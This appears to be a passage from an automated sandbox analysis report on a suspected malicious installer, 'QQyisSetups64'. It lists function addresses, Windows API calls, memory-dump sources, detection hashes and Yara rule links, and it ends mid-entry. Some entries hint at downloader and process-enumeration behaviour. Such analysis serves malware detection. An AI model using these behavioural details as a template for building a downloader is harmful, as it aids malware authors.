Opcode ID: 06106f8a70e923d91bd8a499f21a0db51f82ea5a22d39d64d7c60a21e5b1a94f
Instruction ID: 8fa48943700a81e2c9b2cfce0a1ddd9ba30b149aeda4daa259b851e8e9bcb32b
Opcode Fuzzy Hash: 06106f8a70e923d91bd8a499f21a0db51f82ea5a22d39d64d7c60a21e5b1a94f
Instruction Fuzzy Hash: DE7138B5C0061DDFEB15DFA4C995AEEB7B5FF08290F104229E416B7299EB306E04CB91

Function 1000AEB0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 1000AEE8
?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000AF08
_Min_value.LIBCPMTD ref: 1000AF1F
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000AF33
?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AF5F
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 1000AF9D
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 1000AFEE

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
String ID:
API String ID: 1591557727-0
Opcode ID: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
Instruction ID: a7373feddb38768cb8e80fdeb6ca424b68bff663277300cca749af404b47d492
Opcode Fuzzy Hash: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
Instruction Fuzzy Hash: 1551D8B5E00209EFDB04DFA8C984AEEBBB1FF48344F108169E915A7354D730AE95DB50

Function 10010D65 Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 10010DA2
dllmain_crt_dispatch.LIBCMT ref: 10010DB9
_DllMain@12.MSVCRT ref: 10010DD0
_DllMain@12.MSVCRT ref: 10010DE8
dllmain_raw.LIBCMT ref: 10010E01
dllmain_crt_dispatch.LIBCMT ref: 10010E14
dllmain_raw.LIBCMT ref: 10010E27

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: dllmain_raw$Main@12dllmain_crt_dispatch
String ID:
API String ID: 3353612457-0
Opcode ID: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
Instruction ID: 64606688521fabd1402afb0874e896261f6c1f2fbb559040e4c03d6bc464acc4
Opcode Fuzzy Hash: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
Instruction Fuzzy Hash: D0216B76F00269EEDB21CF56DC41AAF3AA9EB80AD4F014919F8945F210C7B0DD918BE0

Function 1000B350 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B35D
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B36E
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B379
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000B3A3
?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B3D3

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
String ID:
API String ID: 4206206407-0
Opcode ID: 6b14a1aa0a869a74d74b41fa1de30e932df37a59437fcad414ebe2ff8be819e4
Instruction ID: f7c15c91105892140f05b25e0fcfcadb8d2072b0e91d30d5794a3d544de0fed2
Opcode Fuzzy Hash: 6b14a1aa0a869a74d74b41fa1de30e932df37a59437fcad414ebe2ff8be819e4
Instruction Fuzzy Hash: 6E31CEB9D00208ABEB04DFA4D8959AE7B75EF442C0F04C469F8059B24BEB31EE45CB51

Function 0286F237 Relevance: 9.1, APIs: 6, Instructions: 61processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0286F244
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0286F26F
CloseHandle.KERNEL32(000000FF), ref: 0286F2A2

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
Instruction ID: 27388864ddd74a63ebd521195ef53b643acd31e5b9f6b43ce0746c318b1ee88b
Opcode Fuzzy Hash: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
Instruction Fuzzy Hash: 6B115CBC901218FBDB10EBA0DD8CAAE7778AB59301F108694E60AD7251D734EA54DF90

Function 10004020 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004037
memset.VCRUNTIME140(?,00000000,?), ref: 10004074
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004091
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 100040A9
memset.VCRUNTIME140(?,00000000,?), ref: 100040D7

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharMultiWide$memset
String ID:
API String ID: 1216362210-0
Opcode ID: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
Instruction ID: d5d2fc12e147d12df5ef18d66f66630be37a1d65e2a688cbbcfc70e5b1a43c84
Opcode Fuzzy Hash: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
Instruction Fuzzy Hash: 2D3152B5F40208BFEB14DF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA50CB65

Function 02870D3C Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 02870D79
_DllMain@12.MSVCRT ref: 02870DA7
_DllMain@12.MSVCRT ref: 02870DBF
dllmain_raw.LIBCMT ref: 02870DD8
dllmain_raw.LIBCMT ref: 02870DFE

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: dllmain_raw$Main@12
String ID:
API String ID: 2964726511-0
Opcode ID: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
Instruction ID: e08176be8d40a7c85f5adb05ce15c87b5be03c8c0a8884305ab878729c5f0e3f
Opcode Fuzzy Hash: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
Instruction Fuzzy Hash: C921747E901669AADF219E19CD40A6F7E6AEB84798B054225F81CEB210C731DD81CF91

Function 100107D5 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107DD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107EA
_CxxThrowException.VCRUNTIME140(?,10014F2C), ref: 10010EED
stdext::threads::lock_error::lock_error.LIBCPMTD ref: 10010EFC
_CxxThrowException.VCRUNTIME140(?,10014F90), ref: 10010F0A

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
String ID:
API String ID: 1722040371-0
Opcode ID: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
Instruction ID: 6d4aa4042b719817879ad19d1f1f5d821abcde10b660f97fd496c7bb52ecdeee
Opcode Fuzzy Hash: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
Instruction Fuzzy Hash: E8F0BE38D0420DBACB04EAB5EC469DEB7ACEF00290F104530B964AD4E1EFB1F6D58A95

Function 10010720 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(100172D4,URLDownloader,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000), ref: 1001072A
ReleaseSRWLockExclusive.KERNEL32(100172D4,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001075D
WakeAllConditionVariable.KERNEL32(100172D0,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 10010768

Strings

URLDownloader, xrefs: 10010723

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
String ID: URLDownloader
API String ID: 1466638765-1891997712
Opcode ID: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
Instruction ID: 3181bbcb2b9caa1ef0c1f22c926e586b91b1f05f2254f4f57ba8959088f3d27b
Opcode Fuzzy Hash: 135d216f9536d5fef4871bc611d23d6ad4692f8f9cf4bb8f7097ed8d31648b84
Instruction Fuzzy Hash: A0F0C975900224DFE71ADF58DC88A9577B8FB0D350B018069F909C7322CB34E911CB54

Function 0286F057 Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 0286FF47: NdrClientCall2.RPCRT4 ref: 0286FF66

CoTaskMemFree.COMBASE(00000000), ref: 0286F16C
CoTaskMemFree.COMBASE(00000000), ref: 0286F179

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: FreeTask$Call2Client
String ID:
API String ID: 3085621743-0
Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
Instruction ID: d144b95598f01d7cf71f5bdaff15b8026ee57b8986f99e38e747a1526236fb14
Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
Instruction Fuzzy Hash: C35104B8D0020DEBCF05CF94D888BFEB7B6BF58308F108149E616A7640D735AA85CB95

Function 02863FF7 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0286400E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 02864068
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02864080
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 028640CC

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
Instruction ID: 0b4b502acff8624c61df70e4b9a485c97e45208924927cf16a8ca1c3cf5678e7
Opcode Fuzzy Hash: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
Instruction Fuzzy Hash: 383134B9E40204BFEB14EF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA10CB55

Function 1000D330 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10011CF6,000000FF,?,1000CB92,?), ref: 1000D350
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10011CF6,000000FF,?,1000CB92), ref: 1000D36B
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,1000CB92,?), ref: 1000D39F
??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 1000D417

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
String ID:
API String ID: 1566052064-0
Opcode ID: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
Instruction ID: 4d9198b2984e5e082309ff7aa8a3130d82e8df6aeec633f907ab193b7f9989e7
Opcode Fuzzy Hash: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
Instruction Fuzzy Hash: 79313EB4D00259DFDB04DFA4C895BEEBBB4FF48350F208619E915A3395DB34AA40CBA1

Function 10010BB0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 10010BFD

Part of subcall function 100114A3: InitializeSListHead.KERNEL32(10017318,10010C07,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 100114A8

_initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012320,10012324,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C16
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012300,1001231C,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C34
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10010C67

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
String ID:
API String ID: 590286634-0
Opcode ID: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
Instruction ID: 39f7e9c7f58ab3c24a5f1c768587727ae30ebfb406468ad2b612d2fa9f71a151
Opcode Fuzzy Hash: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
Instruction Fuzzy Hash: D421027A7482129AEB18EBB898027CC37A1EF11364F108205F4C96F1C3DBF1E5C18A96

Function 1000BEC0 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 1000CAC0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,1000BEEA,1000CEAD,1000CEAD,6EA14730), ref: 1000CAE4

?good@ios_base@std@@QBE_NXZ.MSVCP140(1000CEAD,1000CEAD), ref: 1000BEFC
?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000BF1D

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@2@D@std@@@std@@$?good@ios_base@std@@?rdbuf@?$basic_ios@?tie@?$basic_ios@V?$basic_ostream@V?$basic_streambuf@
String ID:
API String ID: 3792166412-0
Opcode ID: b006524d6c5c6b204ea1b1033506b15f97613e5eae7ce8f9a61eeb01e7e64a40
Instruction ID: 6403fa240c7e006dd5772fa615f9af8d9caa538eb968de4636cddec1bc8cd2ef
Opcode Fuzzy Hash: b006524d6c5c6b204ea1b1033506b15f97613e5eae7ce8f9a61eeb01e7e64a40
Instruction Fuzzy Hash: EF216D7460064AEFD704CF54C984BAEBBB1FF49344F14C269E8165B391C730E940CB91

Function 1000B2A0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2AD
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2BA
?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2C5
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2D2

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
String ID:
API String ID: 2950233615-0
Opcode ID: 16030182e63fd1f010b90ae5e0ea2653d859c965618dbfa5d57fb4f63939e87b
Instruction ID: 286a1d44accefb07714ea732755267c184901f6fbadf7b8dc8f0254af49e132d
Opcode Fuzzy Hash: 16030182e63fd1f010b90ae5e0ea2653d859c965618dbfa5d57fb4f63939e87b
Instruction Fuzzy Hash: A5110D74E00219EFDB14DFA4D9958AEB7F5FF48240B204199E805A7355EB30AF01EB90

Function 1000C0C0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,1000B486), ref: 1000C0CA
?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0DD
?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0EC
?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(1000B44A,1000B44A,1000B449,?,1000B486), ref: 1000C110

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
String ID:
API String ID: 3089488326-0
Opcode ID: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
Instruction ID: e6559f61c40ac0d619c819a68eafb266e25295ce9371c656e40cb26db6e47210
Opcode Fuzzy Hash: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
Instruction Fuzzy Hash: E5F0FF70900108EFCB08DF98CE9599DB7B6FF48301B20819EE406A3352CB31AF50EB54

Function 028705E7 Relevance: 6.0, APIs: 4, Instructions: 28threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 028705F4
WaitForSingleObject.KERNEL32(00000000), ref: 028705FB
CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 02870610
CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 02870625

Part of subcall function 02861147: LoadLibraryW.KERNEL32(10012398), ref: 02861152
Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
Part of subcall function 02861147: GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
Part of subcall function 02861147: RegisterClassW.USER32(?), ref: 028611E8
Part of subcall function 02861147: CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindow
String ID:
API String ID: 487361192-0
Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
Instruction ID: 88f0037c1de4a8ddbfcfeb8c9d98e3c9592c6855352256938697fb6879bba5e2
Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
Instruction Fuzzy Hash: 12E002B53C4354BAF261B7E45C8FF593655AB09F42F608650F349BD0E1CAF4A450CA2E

Function 028713C0 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 028713D2
GetCurrentThreadId.KERNEL32 ref: 028713E1
GetCurrentProcessId.KERNEL32 ref: 028713EA
QueryPerformanceCounter.KERNEL32(?), ref: 028713F7

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50

Function 100046A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100046D3
Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 100047D2

Strings

.exe, xrefs: 10004735

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

